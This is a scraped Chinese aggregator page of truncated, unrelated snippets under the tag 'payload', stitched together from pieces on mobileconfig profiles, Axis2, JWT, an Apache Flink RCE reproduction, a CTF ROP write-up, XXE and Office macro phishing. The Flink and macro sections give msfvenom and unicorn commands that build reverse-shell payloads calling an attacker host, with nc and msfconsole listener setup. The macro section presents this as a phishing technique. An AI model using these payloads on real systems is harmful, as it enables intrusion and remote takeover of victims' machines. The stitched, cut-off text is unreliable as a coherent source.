payload

mobileconfig file with mdm payload, is invalid profile

徘徊边缘 提交于 2019-12-05 00:18:58
问题 I'm trying to install .mobileconfig file that was created through IPCU. but when I click on an attached .mobileconfig file in mail. It occured error message as "invalid profile". what is problem ? if the certificate is problem, please let us know how to make. Below is the procedure I created the certificate. in keychain, After navigate Keychain Access/Certifiate Assistant/Certificate generate, I have generated Certificate. and exported .p12 file .p12 file is used to Credentials setting in

教程:如何用Axis2开发和部署Web服务

元气小坏坏 提交于 2019-12-04 22:00:13
引言 Axis2 是下一代 Apache Axis。Axis2 虽然由 Axis 1.x 处理程序模型提供支持,但它具有更强的灵活性并可扩展到新的体系结构。Axis2 基于新的体系结构进行了全新编写,而且没有采用 Axis 1.x 的常用代码。支持开发 Axis2 的动力是探寻模块化更强、灵活性更高和更有效的体系结构,这种体系结构可以很容易地插入到其他相关 Web 服务标准和协议(如 WS-Security、WS-ReliableMessaging 等)的实现中。 Axis2 的特性包括: 采用名为 AXIOM(AXIs Object Model,Axis 对象模型)的新核心 XML 处理模型 支持 In-Only 和 In-Out 消息交换模式 (MEP) 阻塞和非阻塞客户端 API(应用程序编程接口) 支持内置的 Web 服务寻址 (WS-Addressing) 支持 XMLBeans 数据绑定 新部署模型 支持超文本传输协议 (HTTP)、简单邮件传输协议 (SMTP) 和传输控制协议 (TCP) 等传输协议 本系列文章以 Axis2 1.0 版本为基础。您可以在 Apache 网站获得 Axis2 的最新版本。 Axis 体系结构概述 图 1. Axis2 体系结构 Axis2 体系结构将逻辑与状态分离;这允许在并行线程中执行逻辑。服务和调用的静态状态和动态状态分别存储在

全栈项目|小书架|服务器开发-JWT 详解

我只是一个虾纸丫 提交于 2019-12-04 21:11:50
摘自: https://www.cnblogs.com/gdragon/p/11878935.html 全栈项目|小书架|服务器开发-JWT 详解 JWT # 官方简介:Introduction to JSON Web Tokens 文章基本是官网内容的翻译,英文不错的同学可点击上面的链接直接看英文文档。 什么是 JWT # JWT 全称是 JSON Web Token(JWT) 是一个 开放标准(RFC 7519) ,它定义了一种紧凑且自包含的方式,用于在各方之间作为 JSON 对象安全地传输信息。由于此信息是经过数字签名的,因此可以被验证和信任。 可以使用密钥( HMAC算法 )或使用 RSA 或 ECDSA 的公用/专用密钥对对 JWT 进行签名。 什么时候使用 JWT 验证 # 授权 (Authorization) 这是使用 JWT 的最常见情况。一旦用户登录,每个后续请求将包括 JWT ,从而允许用户访问该令牌允许的路由,服务和资源。单一登录是当今广泛使用 JWT 的一项功能,因为它的开销很小并且可以在不同的域中轻松使用。 信息交换 (Information Exchange) JWT 是在各方之间安全地传输信息的好方法。因为可以对 JWT 进行签名(例如,使用公钥/私钥对),所以您可以确保发件人是他们所说的人。另外,由于签名是使用 Header 和 payload

java原生手写jwt

这一生的挚爱 提交于 2019-12-04 20:20:28
前言 最近和朋友一起开发的前后端分离项目,我负责后台,他写前端。由于我没有什么实战经验,写的又比较慢(甩锅课很多)他就用node也写了一个后台,实现一个前端两套后台,无缝对接。项目中有用到jwt,本来想的是jwt的工具包,但有一个问题:虽然我们约定了相同的密钥和算法,但工具包签发的jwt只有自己认可,node不认可,而node签发的java不认可。最后发现工具包对密钥进行了加密处理导致密钥不一致而无法无缝对接,只有java后台的话,可以放心使用。 不能用工具包的话,我们就约定手写jwt,按照jwt规范来,废话有点多哈。 一:什么是jwt JSON Web Token(JWT)是一个非常轻巧的规范。这个规范允许我们使用JWT在用户和服务器之间传递安全可靠的信息。 服务器认证之后生成jwt,返回给用户。用户短期内就可以通过服务器签发的jwt来证实自己的合法性,此方案在一定程度上取代了传统的Cookie/session_id认证。特别是在前后端分离多端适配的情况下。 二:jwt原理 数字1部分是我们日常看到的jwt,由Header(头部)、 Payload(负载)、Signature(签名)三个部分组成通过 “.” 连接。 2.1、Header header对应图片右边的数字2部分,描述jwt的元数据,alg属性表示算法的签名,默认是HS256。typ表面了当前的令牌(token

【漏洞复现】Apache Flink任意Jar包上传导致远程代码执行

老子叫甜甜 提交于 2019-12-04 20:07:04
前言 记一次Apache Flink任意Jar包上传导致远程代码执行复现漏洞过程。 作者一直致力于小白都能看懂的漏洞复现过程,感谢大家们一路以来的支持! 致谢Cx01、丞相等表哥们。没有你们的帮助,没有这篇文章! 0x01 漏洞描述 近日,有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行的漏洞. 影响范围:<= 1.9.1(最新版本) 可能是我测的比较少,成功的概率1.9版本比较高。 0x02 漏洞威胁等级 高危 可导致远程代码执行 0x03 漏洞复现 第一步生成payload msfvenom -p java/shell_reverse_tcp LHOST=x.x.x.x LPORT=x -f jar >fuck.jar 名字可以任意取 第二步生成监听端口,这里我选择nc监听端口。 nc -lvp 8000 第三步上传payload 最后直接返回shell 接着执行命令 0x04 复现那些坑 一定要生成公网ip的payload!!! 一定要生成公网ip的payload!!! 一定要生成公网ip的payload!!! 没有钱的小哥哥,小姐姐们可以选择一个Sunny-ngrok 工具进行端口转发。 官方Sunny-ngrok教程 客户端工具下载地址 0x05 批量检测脚本 GitHub地址 脚本源码 """ auth: @l3_W0ng version

Django中使用 JWT

妖精的绣舞 提交于 2019-12-04 19:19:13
JWT # 试用场景,分布式站点的单点登录SSO场景 . 分为三段: 头. 载荷. 签名 1. 第一段: 头部 (json数据进行base64加密) { 'alg':'HS256', # 加密算法 'typ':'JWT' # 类型 } 2. 第二段: 载荷(payload) json数据进行base64加密 -- 标准中注册声明 -- 公共的声明: 用户相关信息或其他业务需要的必要信息 -- 私有的声明: 提供者和消费者共同定义的声明 3. 第三段: 签名 header, payload, secret -- 将header and payload (base64后的) 用点连在一起 -- 将上述字符串 HS256进行加密,加密需要一个secret秘钥 -- 将加密后的字符串也用点拼接在后面, 形成jwt ''' 签名: 实际是对头部和载荷内容进行签名,因使用的秘钥,所以保证token不被篡改 {头信息字典,用base64加密}.{载荷信息字典,用base64加密}.{头加密串,载荷加密串,秘钥,采用hash256加密算法} ''' # 得到JWT后,将jwt存在client, 之后每次需要认证的请求,都要把jwt发送过阿里(可放在header的Authorization) Django Rest Framework JWT # django 中使用jwt #

[WP]CTFwiki-syscall

蹲街弑〆低调 提交于 2019-12-04 18:29:12
1.例行运行并检查程序,32位程序,开启了 NX 保护,这时我们之前写入 shellcode 执行就会失效 2.依然是通过 gets() 来覆盖返回值,当然尽管找到了 /bin/sh 字符串,我们并没有 system("/bin/sh") 来开启shell,这时我们需要调用系统中的函数,(ps:一个系统函数会有一个对应的系统调用号,这个我们可以在 Linux Syscall Reference 查询到)。 3.这里我们调用 execve() 来实现开启 shell。向 EAX 传入0x0b,EBX 中传入"/bin/sh", ECX 和 EDX 传入 0。 4.确定覆盖长度 5.寻找 gadget 来向寄存器传参,以此来构造 exp。当然 gadget 的利用并不唯一,能达到效果即可 6.这里我选用了如下几个 gadget 0x080bb196 : pop eax ; ret 0x0806eb91 : pop ecx ; pop ebx ; ret 0x0806eb6a : pop edx ; ret 7.构造 EXP #!/usr/bin/env python from pwn import * p = process('./rop') #EBP: 0xffffd178 --> 0x8049630 (<__libc_csu_fini>: push ebx) #ESP:

XML外部实体注入[转载]

泄露秘密 提交于 2019-12-04 18:00:28
前言 对于xxe,深入的太少,一般做题也是复制payload再修改,没有了解过内部的结构规范等。这里转载了一篇先知社区的文章,排版了一下适合博客样式。文章总结的很好,结合了很多篇的博客文章,看完也是对于xxe有了大致的了解,更深入的一些bypass还需要参考更多的深入的文章。像红帽杯中的一道web就是xxe触发TP5.2x phar反序列化反弹shell。 0x01:简单了解XML XML 指可扩展标记语言(EXtensible Markup Language) XML 是一种标记语言,很类似 HTML XML 被设计为传输和存储数据,其焦点是数据的内容 XML 被设计用来结构化、存储以及传输信息 XML 允许创作者定义自己的标签和自己的文档结构 XML的优点: xml 是互联网数据传输的重要工具,它可以跨越互联网任何的平台,不受编程语言和操作系统的限制,非常适合Web传输,而且xml有助于在服务器之间穿梭结构化数据,方便开发人员控制数据的存储和传输。 XML的特点及作用: 特点: xml与操作系统、编程语言的开发平台都无关 实现不同系统之间的数据交互 作用: 配置应用程序和网站 数据交互 而且在配置文件里边所有的配置文件都是以 XMl 的格式来编写的,跨平台进行数据交互,它可以跨操作系统,也可以跨编程语言的平台,所以可以看出XML是非常方便的,应用的范围也很广,但如果存在漏洞

利用Windows宏病毒利用

China☆狼群 提交于 2019-12-04 17:51:48
背景: 最近忙的飞起,各种事情,不想吐槽,因为某些事情,还吃了口屎,啧啧啧。。。。。 常见的钓鱼,社工基本技术都是这种,什么鱼叉,水坑,社工,投毒之类的,APT 攻击惯用伎俩。 那么今天主要利用Windows office 宏进行远程攻击。 环境: kail Linux 2018 xface Windows 10 home office 2016 直接上操作: kail linux # git clone https://github.com/trustedsec/unicorn.git 此工具使用具体看帮助信息,这里不多说明,也可以去Git上查看 生成payload: # python unicorn.py windows/meterpreter/reverse_tcp 1.1.1.1 4444 macro 会生成: powershell_attack.txt #office宏payload unicorn.rc #msf使用 两个文件 启动msfconsole use multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 1.1.1.1 set LPORT 4444 set ExitOnSession false set AutoVerifySession false set